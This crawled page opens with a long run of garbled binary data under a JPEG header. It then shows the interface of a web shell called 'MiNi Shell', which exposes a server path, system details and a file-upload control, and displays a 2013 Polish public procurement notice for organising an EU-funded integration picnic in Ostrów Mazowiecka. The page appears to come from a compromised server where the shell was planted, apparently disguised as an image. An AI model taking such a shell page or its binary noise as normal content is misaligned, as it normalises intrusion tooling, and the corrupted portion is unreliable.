JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130624/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130624/122781-N-2013.html

<p class="kh_header"><b>Ostrów Mazowiecka: Organizacja pikniku integracyjnego w ramach projektu Twoja przyszłość w Twoich rękach</b><br>
<b>Numer ogłoszenia: 122781 - 2013; data zamieszczenia: 24.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Widnichowska 20, 07-300 Ostrów Mazowiecka, woj. mazowieckie, tel. 29 645 53 98, faks 29 645 53 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowmaz.pcpr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja pikniku integracyjnego w ramach projektu Twoja przyszłość w Twoich rękach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Termin i miejsce wykonania usługi: 19.07.2013r., boisko przy ul. Rubinkowskiego 8 w Ostrowi Mazowieckiej, w godz. 13:00-22:00. Wykonawca musi zapewnić program z uwzględnieniem poniższych warunków oraz krótkimi prezentacjami dotyczącymi realizowanego projektu Twoja przyszłość w Twoich rękach. Treść tych prezentacji zostanie uzgodniona przez Koordynatora projektu z wyłonionym w postępowaniu Wykonawcą; 2.Wykonawca zapewnia i pokrywa koszty: 2.1. zorganizowania, dostarczenia na miejsce odbywania pikniku i przygotowania sceny o wymiarach co najmniej 6m x 8m, wys. 0,7m, na potrzeby występujących osób. Zadaszenie powinno przykrywać scenę i posiadać zasłonięte boki materiałem mesh, a tylna część sceny normalną zasłoną z plandeki. Wysokość zadaszenia po rozstawieniu powinna pozwalać na swobodne poruszanie się po scenie. Minimum jakie uważamy za stosowne to 3,5m od ziemi. Zadaszenie powinno być tak przymocowane, aby średnia siła wiatru nie naruszała i nie budziła wątpliwości odnośnie bezpieczeństwa uczestników pikniku i osób występujących na scenie; 2.2. zorganizowania, dostarczenia na miejsce odbywania pikniku i przygotowania nagłośnienia oraz oświetlenia, niezbędnego do występów oraz obsługa tych urządzeń podczas trwania pikniku; Zamawiający zapewni dostęp do gniazda siłowego oraz gniazd 230V, jednak w celu uniknięcia przerwy spowodowanej ewentualną awarią Wykonawca musi mieć ze sobą sprawny agregat umożliwiający podłączenie nagłośnienia i oświetlenia w przypadku ewentualnej awarii prądu. 2.2.1. minimalne wymagania odnośnie nagłośnienia: - minimum 5 KW łącznie. Klasy nie mniejszej niż JBL PRX + 2 kolumny odsłuchowe - 2 mikrofony bezprzewodowe - 2 mikrofony przewodowe + statywy - mixer 2.2.2. minimalne wymagania odnośnie oświetlenia: - 6 szt. głowy ruchome - 6 szt. reflektory typu PAR 64 RGB - 6 szt. reflektory typu PAR 54 RGB - 6 szt. belki LED RGB minimum 1m. każda - 2 szt. stroboskop minimum po 1500 W każdy - wytwornica dymu min. 1500 W; 2.3. zapewnienie konferansjera/ów i animatorów do zabaw z dziećmi; 2.4. przygotowania programu animacji edukacyjno- kulturalnej z tematem przewodnim , np. świat magii, świat bajek, dżungla i jej mieszkańcy, podwodny świat i jego mieszkańcy, kosmos dla uczestników pikniku, obejmującego zestawy zabaw dla dzieci i dorosłych, z uwzględnieniem potrzeb osób niepełnosprawnych tj. malowanie twarzy, gry zespołowe, pokazy dużych baniek mydlanych, konkursy z nagrodami; całość programu musi trwać co najmniej w godzinach 1500-1930; 2.5. przygotowania i przeprowadzenia konkursów (nagrody zapewni Zamawiający), w tym podchodów tematycznych (adekwatnych do tematu przygotowanych animacji); 2.6. zorganizowania w trakcie trwania pikniku występu kabaretu lub iluzjonisty z pokazem magii, 2.7. zorganizowania występu gwiazdy wieczoru tj. jednego z wymienionych artystów bądź zespołów muzycznych: Monika Kuszyńska, Alicja Majewska, Robert Rozmus, Buenos Ares, ABBA Cover Show, BoneyM, Boys, Top One, Akcent, Skaner, Bliver, Toples,Czerwone Gitary, Andrzej Sikorowski, Michał Milowicz, Renata Dąbkowska, Stare Dobre Małżeństwo, Norbi, KASA, Wanda i Banda, Farba lub Big Day, trwającego co najmniej 1 godzinę. W ofercie można przedstawić propozycję więcej niż jednego z artystów lub zespołów tu wymienionych do wyboru dla Zamawiającego lub przedstawić propozycję jednego z artystów wymienionych powyżej oraz swoją propozycję artysty bądź zespołu, z których Zamawiający będzie mógł dokonać wyboru. Cena oferty musi pozostać bez zmian bez względu na wybór dokonany przez Zamawiającego; 2.8. zorganizowania występu zespołu disco-polo trwającego co najmniej 1,5 godz. 2.9. zorganizowania w trakcie trwania pikniku występu kabaretu lub iluzjonisty z pokazem magii, nie jest to punkt obowiązkowy, jednak brany pod uwagę podczas oceny ofert; 2.10. należności ZAIKS; 2.11. bezpłatnego wesołego miasteczka dla dzieci uczestniczących w pikniku: co najmniej 4 atrakcje: w tym koniecznie duża dmuchana zjeżdżalnia o wys. o najmniej 3 m, 3-stanowiskowa trampolina z bungee, zamek z piłeczkami oraz do wyboru: gigantyczne piłkarzyki, kule wodne, byk- rodeo,  ścianka wspinaczkowa, kula- zorbing lub dmuchany tor przeszkód. Wszystkie urządzenia muszą być czyste i w stanie technicznym umożliwiającym bezpieczne ich użytkowanie przez uczestników pikniku; 2.12. zapewnienia bezpłatnego kącika zabaw dla dzieci- klocki, malowanki, malowanie twarzy, bańki mydlane itp., kącik ma być zorganizowany w zadaszonym namiocie zapewnionym przez Wykonawcę; 2.13. zapewnienia krzeseł np. plastikowych do ustawienia przed sceną w ilości 80 szt.; krzesła muszą być w stanie umożliwiającym bezpieczne ich użytkowanie; 2.14. zapewnienia namiotu, z bocznymi ściankami z plandeki umożliwiającymi ich podniesienie lub bez bocznych ścianek; namiot ma mieć co najmniej wymiary: 6m x 10m; 2.15. zapewnienia co najmniej 3. przenośnych kabin sanitarnych, w tym co najmniej 1 przystosowanej dla potrzeb osób niepełnosprawnych dla uczestników pikniku, które zostaną ustawione w miejscu wskazanym przez Zamawiającego na terenie, na którym odbywać się będzie piknik /dostarczenie kabin najwcześniej 1 dzień przed piknikiem i ich odbiór po zakończonym pikniku, nie później niż 2 dni po jego zakończeniu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli osoba/y wykonująca/e zamówienie posiada wpis do rejestru przedsiębiorców prowadzących działalność gospodarczą lub innego rejestru, obejmującą swym zakresem przedmiot niniejszego zamówienia. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ) złożonego przez Wykonawcę oraz na podstawie przedłożonej kserokopii wpisu do rejestru przedsiębiorców prowadzących działalność gospodarczą lub innego rejestru</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się wykonaniem w okresie ostatnich 3. lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, usług obejmujących wykonanie, usług obejmujących zorganizowanie co najmniej 3. plenerowych pikników/festynów/imprez integracyjnych dla co najmniej 300 osób każdy. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ) oraz wykazu wykonanych usług (załącznik nr 4 do SIWZ) złożonego przez Wykonawcę wraz z potwierdzeniami ich rzetelnego wykonania przez odbiorców usług</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia, jeżeli przedstawi wykaz sprzętu, który będzie wykorzystany do zorganizowania pikniku, wraz z opisem technicznym i zdjęciami urządzeń (zdjęcia mogą być w formie papierowej bądź na nośniku elektronicznym, zapisane w formacie umożliwiającym ich odtworzenie za pomocą ogólnodostępnych programów do przeglądania zdjęć), sprzętów i zabawek, które będą wykorzystane do organizacji pikniku tj.: scena, nagłośnienie odpowiednie do nagłośnienia plenerowej imprezy dla co najmniej 300 osób, oświetlenie sceny, adekwatne do zaproponowanego programu, agregat umożliwiający w przypadku awarii podłączenie nagłośnienia i oświetlenia. Wszystkie urządzenia muszą być w stanie technicznym umożliwiającym bezawaryjne korzystanie; Ocena spełniania warunku zostanie dokonana na podstawie: 1) oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę (załącznik nr 3 do SIWZ) oraz 2) wykazu sprzętu, który będzie wykorzystany przy realizacji zamówienia wraz z opisem technicznym i zdjęciami</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli: 1. przedstawi wykaz osób, które będą brały udział w wykonywaniu zamówienia, posiadających doświadczenie w zakresie odpowiadającym czynnościom przypisanym do nich przy realizacji niniejszego zamówienia. Wykaz ma obejmować imienne wskazanie osób odpowiedzialnych ze strony Wykonawcy za organizację pikniku wraz z opisem ich doświadczenia w tym zakresie (zgodnie z opisem w załączniku nr 6 do SIWZ); Ocena spełniania warunku zostanie dokonana na podstawie: 1) oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę (załącznik nr 3 do SIWZ) oraz 2) wykazu osób, które będą brały udział w wykonywaniu zamówienia wraz z opisem ich dotychczasowego doświadczenia; (załącznik nr 6 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę (załącznik nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik Nr 1 do SIWZ- Formularz oferty. Załącznik Nr 2 do SIWZ- Oświadczenie o spełnieniu warunków wymaganych z art. 22 ust. 1 oraz art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U z 2010 r. Nr 113, poz. 759 ze zm.), Załącznik Nr 3 do SIWZ- Oświadczenie o spełnianiu warunków udziału w postępowaniu, Załącznik Nr 4 do SIWZ- Wykaz usług zrealizowanych przez Wykonawcę, Załącznik Nr 5 do SIWZ- Oświadczenie o niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne Załącznik nr 6 do SIWZ- Oświadczenie wraz z wykazem osób wykonujących zamówienie Załącznik nr 7 do SIWZ- Oświadczenie o tym, w jakiej części wykonanie zamówienia zostanie zlecone podwykonawcom (oświadczenie należy złożyć jedynie w przypadku, gdy wykonanie zamówienia zostanie zlecone podwykonawcom) Załącznik nr 8 do SIWZ- parafowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Atrakcyjność oferty - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://biuletyn.abip.pl/pcprostrowmaz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie ul. Widnichowska 20 07-300 Ostrów Mazowiecka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2013 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie ul. Widnichowska 20 07-300 Ostrów Mazowiecka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Twoja przyszłość w Twoich rękach jest współfinansowany ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com